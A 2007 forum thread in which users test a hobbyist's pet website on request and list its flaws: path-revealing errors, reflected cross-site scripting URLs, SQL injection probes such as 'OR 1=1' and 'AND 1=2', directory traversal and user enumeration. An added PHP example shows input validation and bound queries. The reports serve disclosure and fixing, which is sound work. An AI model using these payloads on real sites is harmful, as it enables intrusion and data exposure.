djfox Posted November 21, 2007

http://www.aplaceforpets1.com/product.php?id=14

On my laptop, the image of the hedgehog eating will not load. Looking at the page source, it shows that the image is there and that everything is typed correctly. Does the image appear for anyone else? If so, anyone have any idea why it won't load?

(All other images on other sites load and the other images on that site load. I can't figure out why the image won't load on my computer.)

Coreye Posted November 21, 2007

I see the image of him eating. Anyways, here are some errors and security vulnerabilities.

Full Path Disclosure:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 35
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 36
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 39
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 40

djfox Posted November 21, 2007 Author

Huh, those errors weren't showing up at all. Well, I did a bit of editing there. See if it's better.

Coreye Posted November 21, 2007

Cross Site Scripting: On registration you can submit ">code for the email.

Cross Site Scripting: On login you can submit ">code for the username.

Syntax error
http://www.aplaceforpets1.com/category.php?cat=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY id DESC' at line 1

All usernames say "Welcome Back, username" even though it doesn't exist.

Full Path Disclosure: http://www.aplaceforpets1.com/product.php?id=a
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 11
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 12

Cross Site Scripting: http://www.aplaceforpets1.com/category.php?cat=%22%3E%3Cmarquee%3E%3Ch1%3Evulnerable

Table: Table 'aplacef3_hamburger.a' doesn't exist.

Cross Site Scripting: http://www.aplaceforpets1.com/search.php?q=%3Cmarquee%3E%3Ch1%3Evulnerable&Submit=Search

Coreye Posted November 21, 2007

The verification email sends the wrong link. It sent; http://www.secrettrance.net/aplaceforpets/verify_me.php?id=1d13679be8f784f15b55496548dedd3c and it should have sent; http://aplaceforpets1.com/verify_me.php?id=1d13679be8f784f15b55496548dedd3c.

djfox Posted November 21, 2007 Author

> The verification email sends the wrong link. It sent; http://www.secrettrance.net/aplaceforpets/verify_me.php?id=1d13679be8f784f15b55496548dedd3c and it should have sent; http://aplaceforpets1.com/verify_me.php?id=1d13679be8f784f15b55496548dedd3c.

Oh shoot, thanks for letting me know about that.

EDIT

Ok, that should be fixed now.

Coreye Posted November 21, 2007

You can make usernames and passwords longer than the set values you have them at. I just registered a really long username.

Coreye Posted November 21, 2007

To fix the image try this;

<img src='http://www.aplaceforpets1.com/upload/leah_eating.jpg' alt='leah_eating' border='0' />

djfox Posted November 21, 2007 Author

> To fix the image try this;
>
> <img src='http://www.aplaceforpets1.com/upload/leah_eating.jpg' alt='leah_eating' border='0' />

It pulls the image info from a database.

agentsteal Posted November 21, 2007

Array: http://www.aplaceforpets1.com/category.php?cat[]

Array: http://www.aplaceforpets1.com/search.php?q[]

Array: http://www.aplaceforpets1.com/thumbnail.php?img[]

Cross Site Scripting: http://www.aplaceforpets1.com/category.php?cat=<marquee><h1>vulnerable</marquee>

Cross Site Scripting: http://www.aplaceforpets1.com/search.php?q=<marquee><h1>vulnerable</marquee>

Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.

Directory Traversal: http://www.aplaceforpets1.com/thumbnail.php?img=../public_html/puppy/leah.jpg

Drop Down Menu: If you edit the drop down menu on the category page you can submit arbitrary values.

Full Path Disclosure: http://www.aplaceforpets1.com/category.php?offseta[]
<a href="category.php?cat=-1&offseta= Fatal error: Unsupported operand types in /home/aplacef3/public_html/category.php on line 70

Full Path Disclosure: http://www.aplaceforpets1.com/page.php
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/page.php on line 11
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/page.php on line 12

Full Path Disclosure: http://www.aplaceforpets1.com/product.php
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 11
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/aplacef3/public_html/product.php on line 12
Warning: Division by zero in /home/aplacef3/public_html/product.php on line 49

Full Path Disclosure: http://www.aplaceforpets1.com/products.php?browse[]
<a href="products.php?browse= Fatal error: Unsupported operand types in /home/aplacef3/public_html/products.php on line 55

Full Path Disclosure: http://www.aplaceforpets1.com/thumbnail.php
Warning: Division by zero in /home/aplacef3/public_html/thumbnail.php on line 10
Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /home/aplacef3/public_html/thumbnail.php on line 14
Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/aplacef3/public_html/thumbnail.php on line 17
Warning: imagejpeg(): supplied argument is not a valid Image resource in /home/aplacef3/public_html/thumbnail.php on line 19

SQL Error: http://www.aplaceforpets1.com/category.php?cat='
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY id DESC' at line 1

SQL Injection:
http://www.aplaceforpets1.com/category.php?cat=1 OR 1=1
http://www.aplaceforpets1.com/category.php?cat=1 OR 1=2

SQL Injection:
http://www.aplaceforpets1.com/page.php?id=11 AND 1=1
http://www.aplaceforpets1.com/page.php?id=11 AND 1=2

SQL Injection:
http://www.aplaceforpets1.com/product.php?id=14 AND 1=1
http://www.aplaceforpets1.com/product.php?id=14 AND 1=2

User Enumeration: http://www.aplaceforpets1.com/~aplacef3

User Enumeration: http://www.aplaceforpets1.com/~root

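Added example, not part of any post and not the site's code: one way to handle an `id` or `cat` style parameter so that the array, non-numeric and `AND 1=2` inputs reported above all get the same generic response, using a bound query and escaped output. The `products` table, its columns, the helper names and the in-memory SQLite database (standing in for MySQL) are assumptions, and the data is constructed.

```php
<?php
// Added example (not the site's code). Table, columns and helpers are assumed.
// Keep warnings (and the file paths they contain) out of responses.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Accept a request parameter only if it is a plain decimal integer string.
// Rejects arrays (cat[]), letters (id=a), quotes and "14 AND 1=2".
function int_param(array $src, string $key): ?int {
    $v = $src[$key] ?? null;
    if (!is_string($v) || !ctype_digit($v) || strlen($v) > 9) {
        return null;
    }
    return (int)$v;
}

// Escape for HTML body and quoted-attribute contexts.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Look up one product with a bound parameter; null when no row matches.
function find_product(PDO $db, int $id): ?array {
    $st = $db->prepare('SELECT name, image FROM products WHERE id = ?');
    $st->execute([$id]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, image TEXT)');
$db->exec("INSERT INTO products VALUES (14, 'Leah <eating>', 'leah_eating.jpg')");

// Constructed requests mirroring the kinds of input listed in the thread.
$requests = [['id' => '14'], ['id' => 'a'], ['id' => '14 AND 1=2'], ['id' => ['x']], []];
foreach ($requests as $get) {
    $id  = int_param($get, 'id');
    $row = $id === null ? null : find_product($db, $id);
    if ($row === null) {
        echo "404 Not found\n";   // generic message: no paths, no SQL text
        continue;
    }
    echo '<h1>' . h($row['name']) . "</h1>\n";
}
```

Only the first request returns the product, with the name rendered as `Leah &lt;eating&gt;`; the other four receive the identical not-found line.
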
phpSensei Posted November 23, 2007 Share Posted November 23, 2007 didnt check if anyone posted Sql Injection vulnerable http://www.aplaceforpets1.com/search.php?q=<marquee><h1>PWNED%20"he%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerable%20<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>"hello"vulnerable%20"hello"vulnerable%20"hello"vulnerablello"vulnerable Link to comment Share on other sites More sharing options...
helraizer Posted November 23, 2007

Login Failed. Username or password is incorrect. Try again.Welcome Back, helraizer! Logout

What the heck? You put an invalid username and password in and it gives you the option to logout? How do you log out if you haven't logged in?